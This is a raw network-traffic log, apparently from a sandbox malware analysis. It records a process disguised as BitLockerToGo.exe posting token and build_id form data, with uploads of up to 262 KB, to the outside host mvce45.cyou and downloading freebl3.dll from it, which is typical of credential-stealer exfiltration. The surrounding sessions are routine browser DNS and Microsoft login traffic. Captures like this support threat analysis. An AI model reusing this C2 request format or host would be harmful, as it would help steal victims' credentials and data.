Host: mvce45.cyou
Content-Length: 3165
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:48:34 UTC | 3165 | OUT | Data Ascii: ------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------EHDGIJJDGCBKFIDHIEBKCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:35 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
2024-11-21 14:48:35 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49763 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:36 UTC | 320 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JDAFIEHIEGDHIDGDGHDH
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 68733
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-11-21 14:48:37 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:37 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
2024-11-21 14:48:37 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49784 | 172.64.41.3 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:37 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-11-21 14:48:37 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:37 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8e617b532fa342df-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomPC)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49778 | 162.159.61.3 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:37 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-11-21 14:48:37 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:37 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8e617b537f275e60-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom c)


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.8  49788        162.159.61.3    443               1464  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp                Bytes transferred  Direction  Data
2024-11-21 14:48:37 UTC  245                OUT        POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-11-21 14:48:37 UTC  247                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:37 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8e617b538f187c9a-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 22 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom"PC)


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.8  49774        49.13.32.95     443               7684  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp                Bytes transferred  Direction  Data
2024-11-21 14:48:37 UTC  321                OUT        POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 262605
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------DGCAAFBFBKFIDGDHJDBKCont
2024-11-21 14:48:39 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:48:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 49797 | 162.159.61.3 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:37 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-11-21 14:48:38 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Thu, 21 Nov 2024 14:48:38 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8e617b55f9bb43a5-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:38 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 25 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom% c)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 49796 | 172.64.41.3 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:37 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 49798 | 162.159.61.3 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:37 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port
31 | 192.168.2.8 | 49795 | 40.126.53.18 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:38 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
Connection: Keep-Alive
Content-Type: application/soap+xml
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
Content-Length: 4722
Host: login.live.com
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:38 UTC4722OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-21 14:48:39 UTC | 569 | IN | HTTP/1.1 200 OK
Cache-Control: no-store, no-cache
Pragma: no-cache
Content-Type: application/soap+xml; charset=utf-8
Expires: Thu, 21 Nov 2024 14:47:38 GMT
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Referrer-Policy: strict-origin-when-cross-origin
x-ms-route-info: C516_SN1
x-ms-request-id: dfa770bb-df4f-4482-821b-773ddbfdc9b8
PPServer: PPV: 30 H: SN1PEPF0003F95C V: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-XSS-Protection: 1; mode=block
Date: Thu, 21 Nov 2024 14:48:38 GMT
Connection: close
Content-Length: 10197
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 49799 | 162.159.61.3 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:39 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-11-21 14:48:39 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:39 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8e617b5e292a32d3-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a2 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 49800 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:39 UTC | 237 | OUT | GET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-11-21 14:48:40 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:39 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thursday, 21-Nov-2024 14:48:39 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
